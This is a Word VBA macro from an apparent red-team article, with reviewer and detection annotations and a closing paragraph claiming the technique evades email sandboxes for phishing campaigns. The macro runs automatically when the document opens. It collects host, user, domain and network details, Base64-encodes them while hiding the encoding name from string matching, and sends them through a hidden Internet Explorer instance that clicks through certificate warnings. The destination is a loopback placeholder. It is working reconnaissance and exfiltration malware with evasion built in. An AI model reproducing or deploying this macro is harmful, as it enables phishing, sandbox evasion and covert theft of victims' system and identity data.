' Word VBA macro from the article. When the document is opened it collects host
' characteristics (processor-instance count, recent-file count, environment
' variables, network adapters, manufacturer/model), Base64-encodes the joined
' string and appends it to the URL of a request made through a hidden Internet
' Explorer instance.
' NOTE(review): the page shows this listing collapsed onto two lines; line
' breaks and indentation are restored here, tokens are unchanged.
' Analyst summary of observables visible in the code: WMI queries issued from
' the Office process, creation of the InternetExplorer.Application COM object,
' and an HTTP request whose path is one long Base64 string.

' Returns "<Manufacturer>|<Model>" read from Win32_ComputerSystem over WMI.
' NOTE(review): the moniker string looks as if it lost its backslashes when the
' page was extracted (presumably the local root\cimv2 namespace) - confirm
' against the original post.
Function MakeModel()
    retStr = ""
    strComputer = "."
    strQuery = "SELECT * FROM Win32_ComputerSystem"
    Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    For Each objItem In colItems
        ' retStr is overwritten on every pass, so only the last instance survives.
        retStr = objItem.Manufacturer
        retStr = retStr & "|" & objItem.Model
    Next
    MakeModel = retStr
End Function

' Returns "computername|username|userdomain|LOGONSERVER" taken from the process
' environment. No WMI or network access is involved in this function.
Function EnvironVars()
    sHostname = Environ("computername") & "|" & Environ("username") & _
    "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
    EnvironVars = sHostname
End Function

' Returns the number of entries in Word's recent-files list for the current
' application instance.
Function RecentFiles()
    Set wdApp = ActiveDocument.Application
    RecentFiles = wdApp.RecentFiles.Count
End Function

' Returns the result collection of a WMI query against
' Win32_PerfFormattedData_PerfOS_Processor; the caller counts its items.
' The third ExecQuery argument, 48, combines wbemFlagReturnImmediately (16)
' and wbemFlagForwardOnly (32).
' NOTE(review): the Dim line declares objWMIService and Proc, but the code
' uses the undeclared objWMI; the moniker here also appears to have lost
' backslashes in extraction.
Function GetCores()
    Dim objWMIService, cores, Proc, strQuery
    strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
    Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")
    Set cores = objWMI.ExecQuery(strQuery, , 48)
    Set GetCores = cores
End Function

' Returns "<MAC>|<first IP>|" repeated for each physical adapter that has an
' IP-enabled configuration with the same MAC address.
Function GetNetwork()
    retStr = ""
    strComputer = "."
    strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
    Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")
    For Each objItem In colItems
        strMacAddress = objItem.MACAddress
        ' sysName is assigned but never read in the visible code.
        sysName = objItem.SystemName
        For Each ipItem In ipItems
            ' Match adapter to configuration by MAC; only the first address
            ' of the configuration (IPAddress(0)) is recorded.
            If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then
                retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
                Exit For
            End If
        Next
    Next
    GetNetwork = retStr
End Function

' Base64-encodes strData using an MSXML element: the string is converted with
' StrConv(..., vbFromUnicode), stored as the element's typed value, and the
' element's Text is returned.
' The data type name is assembled as "bin.base" plus Chr(54) and Chr(52), i.e.
' "64", so the literal "bin.base64" never appears in the macro text; string
' matching on that literal would not hit this code (intent is inferred).
' NOTE(review): the declared return type is Byte() while the value assigned is
' the element's Text; objNode is set to Nothing but never assigned here.
Private Function Enc(ByVal strData As String) As Byte()
    Dim arrData() As Byte
    arrData = StrConv(strData, vbFromUnicode)
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.nodeTypedValue = arrData
    Enc = objDocElem.Text
    Set objNode = Nothing
    Set objXML = Nothing
End Function

' Inverse of Enc: loads Base64 text into an MSXML element and returns its typed
' value as bytes. In the visible code it is referenced only from a
' commented-out line in DoStuff.
Private Function Dec(ByVal strData As String) As Byte()
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.Text = strData
    Dec = objDocElem.nodeTypedValue
    Set objNode = Nothing
    Set objXML = Nothing
End Function

' Sends strData by navigating a hidden Internet Explorer COM instance to
' address & strData, waits for the page to finish loading, then closes IE.
' Detection notes grounded in the code below:
'   - the request is made by the IE COM server, not by the Office process, so
'     network telemetry keyed on WINWORD.EXE will not show it; an Office
'     process instantiating InternetExplorer.Application is the event to look
'     for (IE started this way typically carries -Embedding on its command line);
'   - the URL is the base address followed directly by the Base64 string;
'   - if an error is raised after On Error is armed, control jumps past
'     IE.Stop / IE.Quit, which leaves the hidden IE instance running.
Sub DoStuff(ByVal strData As String)
    Dim IE As Object
    Dim strBaseURL As String
    Dim pre As String
    ' Loopback placeholder as published; strBaseURL and pre are declared but unused.
    address = "http://127.0.0.1/"
    'strBaseURL = StrConv(Dec(address), 64)
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.navigate address & strData
    ' Armed only after CreateObject and navigate, so failures in those two
    ' calls are not handled here.
    On Error GoTo ErrorHandler
    ' ReadyState 4 is READYSTATE_COMPLETE.
    Do While IE.Busy: DoEvents: Loop
    Do While IE.ReadyState <> 4: DoEvents: Loop
    Set doc = IE.Document
    ' "overridelink" is the id of the "Continue to this website" link on IE's
    ' certificate-error page, so this branch appears to click through a TLS
    ' warning and wait for the real page.
    If Not IsNull(doc.getElementById("overridelink")) Then
        Set lnkOverRide = doc.getElementById("overridelink")
        If Not lnkOverRide Is Nothing Then
            lnkOverRide.Click
            Do While IE.Busy: DoEvents: Loop
            Do While IE.ReadyState <> 4: DoEvents: Loop
            Set doc = IE.Document
        End If
    Else
        Do While IE.Busy: DoEvents: Loop
        Do While IE.ReadyState <> 4: DoEvents: Loop
        Set doc = IE.Document
    End If
    ' The response body text is read into testString and not used afterwards.
    Dim testString As String
    testString = IE.Document.body.innerText
    IE.Stop
    IE.Quit
ErrorHandler:
    Exit Sub
End Sub

' Word auto-run entry point: executes when the document is opened with macros
' allowed, so policies that block macros in documents received from the
' internet stop the whole chain before any collection happens.
' Builds "<count>|<recent files>|<environment>|<network>|<make|model>",
' Base64-encodes it with Enc and passes it to DoStuff.
Sub AutoOpen()
    Dim retStr As String
    Set cores = GetCores
    ' The collection is counted by iteration rather than by a Count property.
    Length = 0
    For Each i In cores
        Length = Length + 1
    Next
    ' One is subtracted from the instance count, presumably to discount the
    ' aggregate _Total instance of the performance class - confirm.
    retStr = Str(Length - 1)
    retStr = retStr & "|" & RecentFiles
    retStr = retStr & "|" & EnvironVars
    retStr = retStr & "|" & GetNetwork
    retStr = retStr & "|" & MakeModel
    retStr = Enc(retStr)
    DoStuff (retStr)
End Sub

We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigations would be to randomize the results or to block the outgoing connection that carries them. The first would be quite difficult, since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult, since the purpose of the sandbox is to let the malware run in order to profile it. For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court, defense.